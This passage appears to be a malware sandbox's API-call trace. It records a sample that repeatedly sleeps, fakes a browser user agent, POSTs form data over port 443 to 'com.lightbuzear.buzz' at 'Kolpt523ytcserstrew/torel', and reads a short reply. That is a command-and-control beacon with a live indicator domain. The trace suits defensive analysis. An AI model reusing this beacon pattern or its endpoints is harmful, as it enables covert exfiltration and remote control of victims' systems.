1 [0243.586] Sleep (dwMilliseconds=0x2710) [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0243.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0243.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0243.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0243.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a10 [0243.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815938 [0243.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a10 | out: hHeap=0x4780000) returned 1 [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0243.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0243.600] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815980 [0243.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0243.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0243.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0243.601] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0243.601] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815818 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815848 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815818 | out: hHeap=0x4780000) returned 1 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815848 | out: hHeap=0x4780000) returned 1 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830cf0 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0243.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0243.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0243.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0243.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0243.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0243.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0243.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0243.604] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0243.604] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0243.604] FreeLibrary (hLibModule=0x71780000) returned 1 [0243.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0243.604] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0243.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0243.604] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0243.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0243.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0243.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0243.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0243.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48158f0 [0243.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815860 [0243.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158f0 | out: hHeap=0x4780000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0243.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815860 | out: hHeap=0x4780000) returned 1 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815ab8 [0243.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0243.606] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0243.606] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0243.606] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0243.606] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0243.606] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0243.606] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0243.606] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0243.606] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0243.606] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0243.606] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0243.606] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0243.606] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0243.606] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0243.606] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0243.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48158f0 [0243.607] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0243.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a10 [0243.607] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158f0 | out: hHeap=0x4780000) returned 1 [0243.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0243.607] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a10 | out: hHeap=0x4780000) returned 1 [0243.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48158f0 [0243.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800118 [0243.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800118 | out: hHeap=0x4780000) returned 1 [0243.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0243.608] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0243.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0243.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0243.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0243.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0243.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0243.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0243.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0243.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0243.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0243.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815998 [0243.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0243.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ad0 [0243.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815998 | out: hHeap=0x4780000) returned 1 [0243.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0243.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ad0 | out: hHeap=0x4780000) returned 1 [0243.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800e60 [0243.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0243.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0243.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e60 | out: hHeap=0x4780000) returned 1 [0243.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800cd0 [0243.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0243.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800be0 [0243.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0243.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0243.610] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0243.611] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0243.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800be0 | out: hHeap=0x4780000) returned 1 [0243.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0243.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0243.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0243.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0243.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0243.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0243.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0243.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0243.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0243.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815830 [0243.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0243.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815908 [0243.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0243.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0243.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815908 | out: hHeap=0x4780000) returned 1 [0243.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800f00 [0243.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0243.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0243.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f00 | out: hHeap=0x4780000) returned 1 [0243.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ca8 [0243.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0243.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ac8 [0243.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0243.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0243.613] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0243.613] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0244.869] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ac8 | out: hHeap=0x4780000) returned 1 [0244.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0244.869] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0244.870] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0244.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0244.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0244.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0244.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815ad0 [0244.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815938 [0244.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ad0 | out: hHeap=0x4780000) returned 1 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0244.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0244.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800f28 [0244.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0244.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0244.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0244.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c58 [0244.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0244.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d70 [0244.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0244.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0244.873] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0244.873] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0244.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d70 | out: hHeap=0x4780000) returned 1 [0244.874] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815950 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815950 | out: hHeap=0x4780000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800b90 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0244.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800b90 | out: hHeap=0x4780000) returned 1 [0244.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e88 [0244.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0244.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800d20 [0244.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0244.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0244.876] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0244.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0244.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800d20 | out: hHeap=0x4780000) returned 1 [0244.876] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0244.877] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0244.877] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0244.877] FreeLibrary (hLibModule=0x71570000) returned 1 [0244.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0244.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0244.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0244.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0244.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0244.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0244.878] Sleep (dwMilliseconds=0x2710) [0245.039] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0245.039] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0245.039] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0245.039] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0245.039] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0245.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0245.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0245.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0245.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0245.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a28 [0245.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0245.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0245.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a28 | out: hHeap=0x4780000) returned 1 [0245.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815908 [0245.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e60 [0245.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e60 | out: hHeap=0x4780000) returned 1 [0245.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0245.049] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c80 [0245.049] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0245.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0245.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: 